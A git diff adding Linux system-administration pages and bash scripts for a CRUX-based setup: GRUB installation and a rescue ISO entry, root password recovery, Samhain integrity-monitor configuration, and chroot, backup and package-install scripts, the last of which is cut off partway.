+
+        <p>Create grub file in /etc/default/grub with values;</p>
+
+        <pre>
+        GRUB_DISABLE_LINUX_UUID=false
+        GRUB_ENABLE_LINUX_LABEL=false
+        </pre>
+
+        <p><a href="http://www.gnu.org/software/grub/manual/grub.html">Grub Manual</a>,
+        install grub on MBR of disk sdb;</p>
+
+        <pre>
+        # grub-install /dev/sdb
+        Installation finished. No error reported.
+        </pre>
+
+        <p>If you are installing on removable media;</p>
+
+        <pre>
+        # grub-install --removable /dev/sdb
+        Installation finished. No error reported.
+        </pre>
+
+        <p>grub-mkconfig generates grub.cfg, it will try to discover
+        available kernels and attempt to generate menu entries for
+        them;</p>
+
+        <pre>
+        # grub-mkconfig -o /boot/grub/grub.cfg
+        Generating grub.cfg ...
+        Found linux image: /boot/vmlinuz-4.9.86-gnu
+        Found initrd image: /boot/initramfs-4.9.86-gnu.img
+        done
+        #
+        </pre>
+
+        <p>Check /boot/grub/grub.cfg, if is wrong add menu to
+        /etc/grub.d/40_custom, replace correct partition from grub-prob
+        output and correct UUID from fstab or blkid</p>
+
+        <pre>
+        # grub-probe --target=hints_string /
+        </pre>
+
+        <h3>1.3.3.1. Rescue iso</h3>
+
+        <p>Simple way to have "resque" system is to mount boot as read only,
+        this assures that even as root nothing can be changed without remount.
+        To have different system independent from host grub will have entry to
+        boot small iso on /boot partition;</p>
+
+        <p>Crux iso is not used because at the moment it fails to
+        find "crux-media" during or after init.</p>
+
+        <pre>
+        $ wget http://ftp.nluug.nl/os/Linux/distr/tinycorelinux/7.x/x86/release/CorePlus-current.iso
+        $ sudo mv CorePlus-current.iso /boot/tinycore.iso
+        </pre>
+
+        <p>Edit /etc/grub.d/40_custom</p>
+
+        <pre>
+
+        menuentry "Rescue" {
+            load_video
+            set gfxpayload=keep
+
+            set isofile="/tinycore.iso"
+            loopback loop $isofile
+            linux (loop)/boot/vmlinuz64 loglevel=3 cde
+            initrd (loop)/boot/corepure64.gz
+        }
+        </pre>
+
+        <h2 id="recover">1.3.4. Recover</h2>
+
+        <h3>Root password</h3>
+
+        <p>On grub boot menu press e to edit boot options, change;</p>
+
+        <pre>
+        linux   /vmlinuz-4.9.92-gnu root=UUID=3bab76f8-e714-45f1-8e30-04cc8a09c3d1 ro single
+        </pre>
+
+        <p>to;</p>
+
+        <pre>
+        linux   /vmlinuz-4.9.92-gnu root=UUID=3bab76f8-e714-45f1-8e30-04cc8a09c3d1 ro init=/bin/bash
+        </pre>
+
+        <p>Boot and mount;</p>
+
+        <pre>
+        # mount -a
+        # mount -o remount,rw /
+        # passwd root
+        # mount -o remount,ro /
+        # sync
+        </pre>
+
+        <p>Reboot computer using power / reset.</p>
+
+        <h2 id="checkup">1.3.5. Checkup</h2>
+
+        <p>If you have qemu installed you can see if it boots, in this
+        example sdb is usb external drive;</p>
+
+        <pre>
+        # qemu-system-x86_64 -kernel /boot/vmlinuz-linux -initrd /boot/initramfs-linux.img -append root=/dev/sdb /dev/sdb2
+        </pre>
+
+        <h3>Debug Grub</h3>
+
+        <h3>Debug initram</h3>
+
+        <pre>
+        /usr/lib/dracut/skipcpio /boot/initramfs-4.9.86-gnu.img | gunzip -c | cpio -i -d
+        36875 blocks
+        </pre>
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+    </body>
+</html>
diff --git a/linux/samhain.html b/linux/samhain.html
new file mode 100644
index 0000000..f679749
--- /dev/null
+++ b/linux/samhain.html
@@ -0,0 +1,265 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>2.6.4. Samhain</title>
+    </head>
+    <body>
+
+        <a href="index.html">GNU/Linux Index</a>
+
+        <h1 id="samhain">2.6.4. Samhain</h1>
+
+        <p>Read 
+        <a href="http://www.la-samhna.de/samhain/manual/">Samhain Manual</a>,
+        samhain is a file and host integrity and intrusion alert system 
+        suitable for single hosts as well as for large, UNIX-based networks. 
+        samhain offers advanced features to support and facilitate 
+        centralized monitoring.</p>
+
+        <p>The client (or standalone) part is called samhain, while the 
+        server is referred to as yule. Both can run as daemon processes.</p>
+
+        <p>Most of the options require being defined at compile time, is
+        easy to start with basic and then compile as more features are
+        required.</p>
+
+        <pre>
+        $ sudo prt-get depinst samhain
+        </pre>
+
+        <dl>
+            <dt>/var/lib/samhain/samhain_file</dt>
+            <dd>signature database</dd>
+            <dt>/etc/samhainrc</dt>
+            <dd>configuration file</dd>
+            <dt>/var/log/samhain.log</dt>
+            <dd>log file</dd>
+        </dl>
+
+        <h2 id="conf">2.6.4.1. Configure</h2>
+
+        <p>For more information on configuration check 
+        <a href="http://www.la-samhna.de/samhain/manual/filedef.htm">Monitoring Policies</a>.
+        Description of section headings;</p>
+
+        <dl>
+            <dt>ReadOnly</dt>
+
+            <dd>All modifications except access times will be 
+            reported for these files.</dd>
+            <dd>Checked: owner, group, permissions, file type, device number,
+            hardlinks, links, inode, checksum, size, mtime, ctime.</dd>
+
+            <dt>LogFiles</dt>
+
+            <dd>Modifications of timestamps, file size, and signature will be
+            ignored.</dd>
+            <dd>Checked: owner, group, permissions, file type, device number,
+            hardlinks, links, inode.<dd>
+
+            <dt>GrowingLogFiles</dt>
+
+            <dd>Modifications of timestamps, and signature will be ignored.
+            Modification of the file size will only be ignored if the file size
+            has increased.</dd>
+            <dd>Checked: owner, group, permissions, file type, device number,
+            hardlinks, links, inode, size >= previous_size, checksum(file start
+            up to previous size) equals previous checksum.</dd>
+
+            <dt>Attributes</dt>
+
+            <dd>Only modifications of ownership, access permissions, and device
+            number will be checked.</dd>
+            <dd>Checked: owner, group, permissions, file type, device number.</dd>
+
+            <dt>IgnoreAll</dt>
+
+            <dd>No modifications will be reported. However, the existence of the
+            specified file or directory will still be checked.</dd>
+
+            <dt>IgnoreNone</dt>
+
+            <dd>All modifications, including access time, but excluding ctime, will
+            be reported - checking atime and ctime would require to play with
+            the system clock.</dd>
+            <dd>Checked: owner, group, permissions, file type, device number,
+            hardlinks, links, inode, checksum, size, mtime, atime.</dd>
+
+        </dl>
+
+        <pre>
+        $ vim /etc/samhainrc
+        </pre>
+
+        <p>This is just a resume, there is a complete template
+        on crux ports?.</p>
+
+        <pre>
+        [Misc]
+
+        [ReadOnly]
+        dir = 0/
+
+        [Attributes]
+        file = /tmp
+        file = /dev
+        file = /media
+        file = /proc
+        file = /sys
+
+        [ReadOnly]
+        dir = 99/etc
+
+        [Attributes]
+        file = /etc/mtab
+        file = /etc/adjtime
+        file = /etc/motd
+        file = /etc/fstab
+
+        file = /etc
+
+        [ReadOnly]
+        dir = 99/boot
+
+        [ReadOnly]
+        dir = 99/bin
+        dir = 99/sbin
+
+        [ReadOnly]
+        dir = 99/lib
+
+        [Attributes]
+        dir = 99/dev
+
+        [IgnoreAll]
+        dir = -1/dev/pts
+
+        [ReadOnly]
+        dir = 99/usr
+
+        [IgnoreAll]
+        dir = -1/usr/ports/core
+        dir = -1/usr/ports/opt
+        dir = -1/usr/ports/contrib
+        dir = -1/usr/ports/work
+        dir = -1/usr/ports/distfiles
+
+        [ReadOnly]
+        dir = 99/var
+
+        [IgnoreAll]
+        dir = -1/var/cache
+        dir = -1/var/lock
+        dir = -1/var/mail
+        dir = -1/var/run
+        dir = -1/var/spool
+        dir = -1/var/tmp
+
+        [Attributes]
+
+        file = /var/lib/mlocate
+        file = /var/lib/mlocate/mlocate.db
+        file = /var/lib/urandom
+        file = /var/lib/urandom/seed
+
+        [GrowingLogFiles]
+        dir = 99/var/log
+
+        file = /var/log/samhain.log.lock
+
+        [Attributes]
+        file = /var/log/old/*.[0-9].gz
+
+        [Misc]
+        IgnoreAdded = /var/log/.*\.[0-9]+$
+        IgnoreAdded = /var/log/.*\.[0-9]+\.gz$
+        IgnoreAdded = /var/log/.*\.[0-9]+\.log$
+        IgnoreAdded = /var/log/[[:alnum:]]+/.*\.[0-9]+$
+        IgnoreAdded = /var/log/[[:alnum:]]+/.*\.[0-9]+\.gz$
+        IgnoreAdded = /var/log/[[:alnum:]]+/.*\.[0-9]+\.log$
+        IgnoreAdded = /var/lib/slocate/slocate.db.tmp
+        IgnoreMissing = /var/lib/slocate/slocate.db.tmp
+
+        [IgnoreNone]
+
+        [Prelink]
+
+        [User0]
+
+        [User1]
+
+        [EventSeverity]
+
+        [Log]
+        MailSeverity=notice
+        PrintSeverity=none
+
+        [Misc]
+        Daemon = yes
+        ChecksumTest=check
+        SetNiceLevel = 19
+        SetIOLimit = 500
+        SetLoopTime = 600
+        SetFileCheckTime = 7200
+        ReportOnlyOnce = True
+        SetMailTime = 86400
+        SetMailNum = 10
+        SetMailAddress=root@localhost
+        SyslogFacility=LOG_LOCAL2
+
+        </pre>
+
+        <p>Initialize database;</p>
+
+        <pre>
+        # samhain -t init -p notice
+        </pre>
+
+        <p>If you want to "restart" remove samhain_file and run again 
+        the command above. If daemon is set on config file you just 
+        need to run;</p>
+
+        <pre>
+        # samhain -t check -p notice
+        </pre>
+
+        <p>To control daemon;</p>
+
+        <pre>
+        # samhain stop
+        # samhain start
+        # samhain restart
+        # samhain reload or force-reload
+        # samhain status
+        </pre>
+
+        <h2 id="updatedb">2.6.4.2. Update database</h2>
+
+        <p><a href="http://www.la-samhna.de/samhain/manual/updating-the-file-signature-database.html">Manual</a>,
+        You can update the database while the daemon is running, as long
+        as you don't interfere with its logging. Using flag -l like this
+        samhain -t update -l none make sure the log file is not accessed.</p>
+
+        <pre>
+        # samhain -t update -l none --interactive
+        </pre>
+
+        <p>Interactive update are supported with the command line flag
+        --interactive. A file with a list of good files, absolute path, 
+        one per line, can be passed with flag --listfile. Example;</p>
+
+        <pre>
+        # samhain -t update -l none --listfile=/root/list_of_files
+        </pre>
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>
+        This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+
+    </body>
+</html>
diff --git a/linux/scripts/act-chroot.sh b/linux/scripts/act-chroot.sh
new file mode 100644
index 0000000..29103b1
--- /dev/null
+++ b/linux/scripts/act-chroot.sh
@@ -0,0 +1,15 @@
+#!/bin/bash
+
+CHROOT="/mnt"
+
+mkdir -p $CHROOT/boot/efi
+mkdir -p $CHROOT/media
+
+mkdir -p $CHROOT/dev
+mkdir -p $CHROOT/tmp
+mkdir -p $CHROOT/proc
+mkdir -p $CHROOT/sys
+
+mount -t proc proc $CHROOT/proc
+mount -t sysfs sys $CHROOT/sys
+mount --bind /dev $CHROOT/dev
diff --git a/linux/scripts/backup-ports.sh b/linux/scripts/backup-ports.sh
new file mode 100644
index 0000000..bac18e5
--- /dev/null
+++ b/linux/scripts/backup-ports.sh
@@ -0,0 +1,136 @@
+#!/bin/bash
+
+DEST_SYS=/usr/ports/releases/stable
+DEST_ARC=/usr/ports/releases/archives
+
+#PACKAGES=/usr/ports/packages
+PACKAGES=/usr/ports/archive/packages
+
+#PRT_GET_FLAGS="-fr -if -is"
+PRT_GET_FLAGS="-fr"
+
+# Build Name = R1 (System number) D1 (Droid/Machine number)
+BUILD_NAME="R1D9"
+#echo "Give build NAME;"
+#echo "${DEST_ARC}/NAME-0.0.0.targ.gz"
+#read BUILD_NAME
+
+#internal
+database=${DEST_SYS}/pkg-db.tar.gz
+ports=${DEST_SYS}/etc-ports.tar.gz
+metadata=${DEST_SYS}/metadata.tar.gz
+build=${DEST_SYS}/metadata/build-version
+portsver=${DEST_SYS}/metadata/ports-releases
+all=${DEST_SYS}/metadata/all-installed
+collinst=${DEST_SYS}/metadata/installed
+notfound=${DEST_SYS}/metadata/not-found
+
+echo "Give build CRUX_RELEASE.VERSION (3.4.X);"
+echo "${DEST_ARC}/${BUILD_NAME}-VERSION.tar.gz"
+read BUILD_VERSION
+
+mkdir -p ${DEST_SYS}
+mkdir -p ${DEST_ARC}
+mkdir -p ${DEST_SYS}/metadata
+
+archive="${DEST_ARC}/${BUILD_NAME}-${BUILD_VERSION}.tar" 
+echo "Creating $archive  ..."
+if [ -f ${archive} ]; then
+	rm ${archive}
+fi
+
+backup_collections() {
+
+    # backup collection packages
+    while read COLL_VERSION; do
+	    COLL_NAME=$(echo $COLL_VERSION | cut -d "-" -f 1)
+	    COLL_RELEASE=$(echo $COLL_VERSION | cut -d "-" -f 2)
+
+	    if [ -f ${DEST_SYS}/${COLL_VERSION}.tar ]; then
+	    	rm ${DEST_SYS}/${COLL_VERSION}.tar
+	    fi
+
+	    while read PORT_NAME; do
+		    # get installed version not version on ports
+		    PACKAGE=$(grep "^${PORT_NAME}#" ${all})
+
+		    # check if binary package exist
+		    if [ ! -f /usr/ports/packages/${PACKAGE} ]; then
+			    echo "Building package: ${PACKAGE};"
+			    sudo prt-get update ${PRT_GET_FLAGS} ${PORT_NAME}
+		    fi
+
+		    if [ -f /usr/ports/packages/${PACKAGE} ]; then
+			    echo ${PACKAGE} >> ${DEST_SYS}/metadata/${COLL_NAME}-backup
+			    tar rvf ${DEST_SYS}/${COLL_VERSION}.tar --directory=${PACKAGES} ${PACKAGE}
+		    else
+			    echo "Package ${PACKAGE} from ${PORT_NAME} port not found."
+			    echo ${PACKAGE} >> ${notfound}-${COLL_VERSION}
+		    fi
+    	    done < ${collinst}-${COLL_NAME}
+
+	    tar rvf $archive --directory=${DEST_SYS} ${COLL_VERSION}.tar 
+
+    done < ${portsver}
+}
+
+create_metadata() {
+
+    echo "${BUILD_NAME}-${BUILD_VERSION}" > ${build}
+
+    # archive pkgutils data
+    tar --xattrs -zcpf $database --directory=/var/lib/pkg/ db
+    tar rvf $archive --directory=${DEST_SYS} $(basename ${database})
+
+    # archive ports data
+    tar --xattrs -zcpf $ports --directory=/etc/ports .
+    tar rvf $archive --directory=${DEST_SYS} $(basename ${ports})
+
+    # must be using gwak instead of sed
+    prt-get listinst -v | sed 's/ /#/g' | sed 's/$/.pkg.tar.gz/g' > ${all}
+
+    if [ -f ${portsver} ]; then
+	    rm ${portsver}
+    fi
+
+    for filename in /etc/ports/*.git; do
+	source $filename
+
+	echo "${NAME} port collection release (exp; ${BUILD_VERSION}):"
+
+	read RELEASE
+	echo ${NAME}-${RELEASE} >> ${portsver}
+
+	# backup ports collection
+	echo "Backing up collection: 	${NAME}"
+	tar --xattrs -zcpf ${DEST_SYS}/"ports"-${NAME}-${RELEASE}.tar.gz \
+		--directory=/usr/ports/${NAME} \
+		--exclude=.git \
+		.
+
+    	tar rvf $archive --directory=${DEST_SYS} "ports"-${NAME}-${RELEASE}.tar.gz
+
+	# create list of installed packages 
+	prt-get printf "%i %p %n\n" | grep "yes /usr/ports/${NAME}" | cut -d " " -f 3 > ${collinst}-${NAME}
+
+done
+}
+
+create_archive() {
+    tar --xattrs -zcpf ${metadata} --directory=${DEST_SYS} metadata/
+    tar rvf $archive --directory=${DEST_SYS} $(basename ${metadata})
+}
+
+update_host() {
+	echo "Creating links to /usr/ports/installed"
+	rm -r /usr/ports/installed
+	pkg_installed
+
+	echo "Creating ports page"
+	portspage --title=${BUILD_NAME}-${BUILD_VERSION} /usr/ports/installed > /usr/ports/installed/index.html
+}
+
+create_metadata
+backup_collections
+create_archive
+update_host
diff --git a/linux/scripts/backup-system.sh b/linux/scripts/backup-system.sh
new file mode 100644
index 0000000..22fe588
--- /dev/null
+++ b/linux/scripts/backup-system.sh
@@ -0,0 +1,194 @@
+#!/bin/bash
+
+ROOT_DIR=
+DEST_DIR=/root/backup
+DEST_SYS="${DEST_DIR}/system"
+DATA_CNF="${DEST_DIR}/conf"
+DATA_USR="${DEST_DIR}/user"
+DATA_SRV="${DEST_DIR}/srv"
+
+ConfirmOrExit ()
+{
+    while true
+    do
+        echo -n "Please confirm (y or n) :"
+        read CONFIRM
+        case $CONFIRM in
+            y|Y|YES|yes|Yes) break ;;
+            n|N|no|NO|No)
+                echo "Aborting - you entered $CONFIRM"
+                exit
+                ;;
+	*) echo "Please enter only y or n"
+esac
+done
+echo "You entered $CONFIRM. Continuing ..."
+}
+
+print_data () {
+    echo "ROOT_DIR=${ROOT_DIR}"
+    echo "DEST_DIR=${DEST_DIR}"
+    echo "DEST_SYS=${DEST_SYS}"
+    echo "DATA_CNF=${DATA_CNF}"
+    echo "DATA_USR=${DATA_USR}"
+    echo "DATA_SRV=${DATA_SRV}"
+}
+
+print_help() {
+    echo "usage: backup-system [options]"
+    echo "options:"
+    echo "  -r,   --root                root directory to backup, default /"
+    echo "  -d,   --destination         save backup, default /root/backup"
+    echo "  -h,   --help                print help and exit"
+}
+
+while [ "$1" ]; do
+    case $1 in
+        -r|--root)
+            ROOT_DIR=$2
+            if [ ${ROOT_DIR} == "/" ]; then
+                ROOT_DIR=""
+            fi
+            shift ;;
+        -d|--destination)
+            DEST_DIR=$2
+
+            # Destination directory
+	    DEST_SYS="${DEST_DIR}/system"
+	    DATA_CNF="${DEST_DIR}/conf"
+	    DATA_USR="${DEST_DIR}/user"
+	    DATA_SRV="${DEST_DIR}/srv"
+
+            shift ;;
+        -h|--help)
+            print_help
+            exit 0 ;;
+        *)
+            echo "backup-system: invalid option $1"
+            print_help
+            exit 1 ;;
+    esac
+    shift
+done
+
+print_data
+ConfirmOrExit
+
+mkdir -p ${DATA_CNF}
+mkdir -p ${DATA_USR}
+mkdir -p ${DATA_SRV}
+
+# Backup system settings
+tar --xattrs -zcpf $DATA_CNF/etc.tar.gz \
+    --directory=$ROOT_DIR/etc \
+    .
+
+tar --xattrs -zcpf $DATA_CNF/usr_etc.tar.gz \
+    --directory=$ROOT_DIR/usr/etc \
+    .
+
+bacup_home_metadata () {
+# User Meta Data
+
+    for dir in /home/*; do
+	if [ "${dir}" != "/home/lost+found" ]; then
+	    user=$(basename $dir)
+	    tar --xattrs -zcpf "${DATA_USR}/meta-${user}.tar.gz" \
+		$dir/.bash_profile \
+		$dir/.bashrc \
+		$dir/.config \
+		$dir/.gitconfig \
+		$dir/.gnupg \
+		$dir/.irssi \
+		$dir/.lynxrc \
+		$dir/.mutt \
+		$dir/.netrc \
+		$dir/.profile \
+		$dir/.spectrwm.conf \
+		$dir/.ssh \
+		$dir/.tmux.conf \
+		$dir/.vim \
+		$dir/.vimrc \
+		$dir/.xinitrc
+
+	    # encript data
+	    #gpg --output "${DATA_USR}/meta-${user}.tar.gz.gpg" \
+		#    --encrypt --recipient user@host \
+		#    "${DATA_USR}/meta-${user}.tar.gz"
+
+	    tar --xattrs -zcpf "${DATA_USR}/gitolite-${user}.tar.gz" \
+		$dir/gitolite-admin
+	fi
+    done
+}
+
+backup_services () {
+    # backup web data first stop php and nginx
+    for pkg_www in ${ROOT_DIR}/srv/www/*; do
+	if [[ ! $(ls ${pkg_www} | grep -v "backup_deploy") = "" ]]; then
+	    pkg_back="${DATA_SRV}/www"
+	    if [ ! -d ${pkg_back} ]; then
+		mkdir -p ${pkg_back}
+	    fi
+	    bck_file="${pkg_back}/$(basename ${pkg_www}).tar.gz"
+	    exc="${pkg_www}/backup_deploy"
+	    tar --exclude ${exc} --xattrs -zcpf ${bck_file} ${pkg_www}
+	fi
+    done
+
+    # backup database data first dump all databases
+    pkg_back="${DATA_SRV}/pgsql"
+    if [ ! -d ${pkg_back} ]; then
+	mkdir -p ${pkg_back}
+    fi
+    pg_dumpall -U postgres | gzip > ${pkg_back}/cluster_dump.gz
+
+    tar --xattrs -zcpf "${pkg_back}/pgsql-conf.tar.gz" \
+	${ROOT_DIR}/srv/pgsql/data/pg_hba.conf \
+	${ROOT_DIR}/srv/pgsql/data/pg_ident.conf \
+	${ROOT_DIR}/srv/pgsql/data/postgresql.conf
+
+
+    # backup gitolite repositories
+    pkg_back="${DATA_SRV}/gitolite"
+    if [ ! -d ${pkg_back} ]; then
+	mkdir -p ${pkg_back}
+    fi
+
+    tar --xattrs -zcpf "${pkg_back}/gitolite.tar.gz" \
+	--directory=${ROOT_DIR}/srv/gitolite \
+	.
+}
+
+while true
+do
+    echo "Backup User Metadata ?"
+    echo "Please confirm (y or n): "
+    read CONFIRM
+    case $CONFIRM in
+        n|N|no|NO|No) break ;;
+        y|Y|YES|yes|Yes)
+            echo "Accept - you entered $CONFIRM"
+            bacup_home_metadata
+            break
+            ;;
+        *) echo "Please enter only y or n"
+    esac
+done
+
+# Server Data
+while true
+do
+    echo "Backup Server Data ?"
+    echo "Please confirm (y or n): "
+    read CONFIRM
+    case $CONFIRM in
+        n|N|no|NO|No) break ;;
+        y|Y|YES|yes|Yes)
+            echo "Accept - you entered $CONFIRM"
+            backup_services
+            break
+            ;;
+        *) echo "Please enter only y or n"
+    esac
+done
diff --git a/linux/scripts/chroot.sh b/linux/scripts/chroot.sh
new file mode 100644
index 0000000..00fbd78
--- /dev/null
+++ b/linux/scripts/chroot.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+
+CHROOT=/mnt
+
+chroot $CHROOT /usr/bin/env -i \
+  HOME=/root TERM="$TERM" PS1='\u:\w\$ ' \
+  PATH=/bin:/usr/bin:/sbin:/usr/sbin \
+  /bin/bash --login
+
diff --git a/linux/scripts/install-core.sh b/linux/scripts/install-core.sh
new file mode 100644
index 0000000..078aa3b
--- /dev/null
+++ b/linux/scripts/install-core.sh
@@ -0,0 +1,179 @@
+#!/bin/bash
+
+CHROOT="/mnt"
+PORT_PKG="${CHROOT}/media/crux"
+INSTALL_OPT=0
+
+#echo "1.1.8. Install Handbook\n"
+#cp ${PORT_PKG}/handbook.txt $CHROOT/root/
+
+ConfirmOrExit()
+{
+    while true
+    do
+        echo -n "Please confirm (y or n) :"
+        read CONFIRM
+        case $CONFIRM in
+            y|Y|YES|yes|Yes) break ;;
+            n|N|no|NO|No)
+                echo "Aborting - you entered $CONFIRM"
+                exit
+                ;;
+            *) echo "Please enter only y or n"
+        esac
+    done
+    echo "You entered $CONFIRM. Continuing ..."
+}
+
+
+install_core() {
+
+    mkdir -p ${CHROOT}/var/lib/pkg
+    touch ${CHROOT}/var/lib/pkg/db
+
+    CORE_LS="${DATA_DIR}/core.pkg"
+
+    if [ ! -f ${CORE_LS} ]; then
+        CORE_LS=${CHROOT}/core.pkg
+        echo "1.1.4 Create core.pkg and install pkgadd"
+        for p in ${PORT_PKG}/core/*;
+        do
+            echo $(basename $p) >> ${CORE_LS};
+        done
+    fi
+
+    # it is required a degree in astrophysics in order to figure out how to extract a file to a target folder
+    bsdtar -C ${CHROOT} -xf "${PORT_PKG}/core/pkgutils#5.40.7-1.pkg.tar.xz" usr/bin/pkgadd
+    mv ${CHROOT}/usr/bin/pkgadd ${CHROOT}
+    chmod +x ${CHROOT}/pkgadd
+
+    echo "1.1.4 File core.pkg complete, review list of packages before continue... [PRESS ENTER]"
+    read PAUSE
+    vim ${CORE_LS}
+
+    echo "1.1.4 Starting install"
+
+    #cd $CHROOT
+    while read line; do
+        pkg=${PORT_PKG}/core/${line}
+        echo "Installing ${pkg}"
+        #${CHROOT}/pkgadd -f -r ${CHROOT} ${pkg}
+        ${CHROOT}/pkgadd -f -r ${CHROOT} ${pkg}
+    done < ${CORE_LS}
+
+    rm ${CHROOT}/pkgadd
+
+    if [ -f ${CHROOT}/core.pkg ]; then
+        rm ${CHROOT}/core.pkg;
+    fi
+}
+
+install_packages() {
+    echo "Installing ${PORT_PKG}/opt/fakeroot"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/fakeroot#*
+    echo "Installing ${PORT_PKG}/opt/dbus"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/dbus#*
+    echo "Installing ${PORT_PKG}/opt/expat"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/expat#*
+    echo "Installing ${PORT_PKG}/opt/libnl"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/libnl#*
+    echo "Installing ${PORT_PKG}/opt/libpng"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/libpng#*
+    echo "Installing ${PORT_PKG}/opt/freetype"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/freetype#*
+    echo "Installing ${PORT_PKG}/opt/libffi"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/libffi#*
+    echo "Installing ${PORT_PKG}/opt/sqlite3"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/sqlite3#*
+    echo "Installing ${PORT_PKG}/opt/python"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/python#*
+    echo "Installing ${PORT_PKG}/opt/glib"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/glib#*
+    echo "Installing ${PORT_PKG}/opt/grub2"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/grub2#*
+    echo "Installing ${PORT_PKG}/opt/grub2-efi"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/grub2-efi#*
+    echo "Installing ${PORT_PKG}/opt/wireless-tools"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/wireless-tools#*
+    echo "Installing ${PORT_PKG}/opt/wpa_supplicant"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/wpa_supplicant#*
+    echo "Installing ${PORT_PKG}/opt/lvm2"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/lvm2#*
+    echo "Installing ${PORT_PKG}/opt/mdadm"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/mdadm#*
+    echo "Installing ${PORT_PKG}/opt/efivar"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/efivar#*
+    echo "Installing ${PORT_PKG}/opt/efibootmgr"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/efibootmgr#*
+    echo "Installing ${PORT_PKG}/opt/dosfstools"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/dosfstools#*
+    echo "Installing ${PORT_PKG}/opt/parted"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/parted#*
+    echo "Installing ${PORT_PKG}/opt/libgcrypt"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/libgcrypt#*
+    echo "Installing ${PORT_PKG}/opt/cryptsetup"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/cryptsetup#*
+    echo "Installing ${PORT_PKG}/opt/popt"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/popt#*
+    echo "Installing ${PORT_PKG}/opt/libgpg-error"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/libgpg-error#*
+    echo "Installing ${PORT_PKG}/opt/libevent"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/libevent#*
+    echo "Installing ${PORT_PKG}/opt/libtirpc"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/libtirpc#*
+    echo "Installing ${PORT_PKG}/opt/git"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/git#*
+    echo "Installing ${PORT_PKG}/opt/tmux"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/tmux#*
+    echo "Installing ${PORT_PKG}/opt/prt-utils"
+    $CHROOT/usr/bin/pkgadd -f -r $CHROOT ${PORT_PKG}/opt/prt-utils#*
+}
+
+print_data() {
+    echo "1.1.4 Paths to packages and target:"
+    echo "chroot: ${CHROOT}"
+    echo "packages dir: ${PORT_PKG}"
+    echo "install optional: ${INSTALL_OPT}"
+}
+
+print_help() {
+	echo "usage: install-core [options]"
+	echo "options:"
+	echo "  -r,   --chroot              default chroot is /mnt"
+	echo "  -p,   --packages            packages directory /mnt/media/crux"
+	echo "  -o,   --optional            install extra packages"
+	echo "  -h,   --help                print help and exit"
+}
+
+while [ "$1" ]; do
+            case $1 in
+                    -r|--chroot)
+                        CHROOT=$2
+                        shift ;;
+                    -p|--packages)
+                        PORT_PKG=$2
+                        shift ;;
+                    -o|--optional)
+                        INSTALL_OPT=1
+                        ;;
+                    -h|--help)
+                        print_help
+                        exit 0 ;;
+                    *)
+                        echo "setup-iso: invalid option $1"
+                        print_help
+                        exit 1 ;;
+            esac
+            shift
+done
+
+print_data
+ConfirmOrExit
+install_core
+echo "=========[ core installed ]==========="
+
+if [[ $INSTALL_OPT -eq 1 ]];
+then
+    install_packages
+    echo "=========[ extra packages installed ]==========="
+fi
diff --git a/linux/scripts/mirror-system b/linux/scripts/mirror-system
new file mode 100755
index 0000000..73a5473
--- /dev/null
+++ b/linux/scripts/mirror-system
@@ -0,0 +1,73 @@
+#!/bin/bash
+
+if [ -f /tmp/mirror ]; then
+	echo "mirror system is already running"
+	exit 0
+fi
+
+touch /tmp/mirror
+
+#BUILD_NAME="R2D9"
+#BUILD_TITLE="${BUILD_NAME}-$(cat /usr/ports/releases/stable/metadata/build-version)"
+BUILD_TITLE="Crux 3.6"
+
+# Update system
+ports -u
+
+# make them look like updated
+echo "touch packages..."
+for package in /usr/ports/packages/*; do
+	touch ${package};
+done
+
+# make sure permissions are right
+echo "chown pkgmk:pkgmk -R /usr/ports"
+chown pkgmk:pkgmk -R /usr/ports
+
